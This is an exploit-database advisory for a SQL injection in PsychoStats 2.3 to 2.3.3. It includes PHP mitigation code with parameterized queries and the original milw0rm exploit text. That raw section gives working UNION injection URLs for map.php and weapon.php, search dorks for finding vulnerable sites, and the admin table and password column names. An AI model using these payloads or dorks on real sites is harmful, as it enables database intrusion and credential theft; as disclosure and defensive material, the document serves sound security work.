Vendor: PsychoStats
By: Mr.SQL
CVSS: 7.5 (HIGH)
Vulnerability Type: SQL Injection
CWE: 89
Product Name: PsychoStats
Affected Version From: v2.3
Affected Version To: v2.3.3
Patch Exists: Unknown
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A

rEm0te SQL InjEction VulnErability

PsychoStats versions v2.3, v2.3.1 and v2.3.3 are vulnerable to a remote SQL injection vulnerability. An attacker exploits it by supplying crafted SQL in a request parameter that the application concatenates into a database query. The vulnerable parameter is 'id' in both 'map.php' and 'weapon.php'. Because the injected value is placed in a SELECT, the 'union' operator can be used to append a second query and read data from other tables. The advisory names the tables 'psuser', 'ps_user', 'psadmin' and 'pas_admin' and the columns 'username', 'password', 'plr' and 'name' (the original author notes that sites may have renamed these tables).

Mitigation:

Developers should use parameterized queries to prevent SQL injection attacks. Input validation should also be used to detect malicious inputs.
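As an added illustration of the mitigation above (example code, not PsychoStats' own; the 'weapons' table name and the 'id' column are assumed placeholders), the vulnerable concatenation pattern beside a hardened PDO version that validates the parameter and binds it:

```php
<?php
// Added example; not PsychoStats' own code. "weapons" and "id" are
// placeholder names standing in for whatever weapon.php/map.php query.

/**
 * Vulnerable pattern: the untrusted 'id' value is interpolated straight
 * into the SQL text, so "1 union select 1,user(),3,..." is parsed as SQL.
 */
function getWeaponVulnerable(PDO $db, array $get): ?array
{
    $id  = $get['id'] ?? '';
    $row = $db->query("SELECT * FROM weapons WHERE id = $id")
              ->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

/**
 * Hardened pattern: reject anything that is not a positive integer, then
 * bind the value as a typed parameter so the driver never treats it as SQL.
 */
function getWeaponSafe(PDO $db, array $get): ?array
{
    $id = filter_var(
        $get['id'] ?? null,
        FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 1]]
    );
    if ($id === false) {
        http_response_code(400);   // "1 union select ..." is rejected here
        return null;
    }
    $stmt = $db->prepare('SELECT * FROM weapons WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

/**
 * Connection setup: use real server-side prepared statements (no client
 * emulation) and throw on errors so a failed query cannot silently pass.
 */
function connect(string $dsn, string $user, string $pass): PDO
{
    return new PDO($dsn, $user, $pass, [
        PDO::ATTR_EMULATE_PREPARES => false,
        PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
    ]);
}
```

Integer validation alone is enough for a numeric 'id'; the prepared statement is the general defence for parameters that legitimately contain text.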

Exploit-DB raw data:

###############################################################
#################### Viva IslaM Viva IslaM ####################
##
## rEm0te SQL InjEction VulnErability 
##
## PsychoStats Versions (( - v2.3 - v2.3.1 - v2.3.3 - )) ( map.php id ) & ( weapon.php id )
##                              
###############################################################
###############################################################
##
## AuTh0r : Mr.SQL   -(:: ThE Geek InjEcT0r ::)-
##
## H0ME   : WwW.PaL-HaCkEr.CoM
##
## Email  :  SQL@Hotmail.it
##
#########################
#########################
##
## Script Name  : PsychoStats Versions (( - v2.3 - v2.3.1 - v2.3.3 - ))
##
## Download ScriptS : www.psychostats.com/downloads/
##
## D0rk F0r all Versions ::   "Powered by PsychoStats"
##
#########################
#########################

n0te :: Tables  (( psuser  0r  ps_user 0r psadmin 0r pas_admin )) get the table_name maybe Sites changed tables :))
     :: columns (( username 0r password 0r plr 0r name ))
       & in the exploit don't use -

n0te :: The Script has different Versions; you can get the source and search for other bugs


#########################
#########################
##
## PsychoStats v2.3 
##
## D0rK ::  "Powered by PsychoStats v2.3"
##
#########################
##
##   -(:: SQL ::)-
##
##    www.site.com/
##          weapon.php?id=1+union+select+1,user(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--
##
#########################
#########################



#########################
#########################
##
## PsychoStats v2.3.1 
##
## D0rK ::  "Powered by PsychoStats v2.3.1"
##
#########################
##
##   -(:: SQL ::)-
##
##   www.site.com/
##          map.php?id=1+union+select+1,2,3,4,5,6,7,8,9,10,11,user(),13,14,15,16,17--
##
#########################
#########################



#########################
#########################
##
## PsychoStats v2.3.3
##
## D0rK ::  "Powered by PsychoStats v2.3.3"
##
#########################
##
##   -(:: SQL ::)-
##
##     www.site.com/
##          weapon.php?id=1+union+select+1,user(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19/*       
##
#########################
#########################


#############################################################################

                      -(:: Gr3E3E3E3E3E3E3Tz ::)-

  :: HaCkEr-EGy :: Dark MaSTer :: MoHaMeD el 3rab :: ALwHeD :: HeBarieH :: 

#############################################################################

# milw0rm.com [2008-05-31]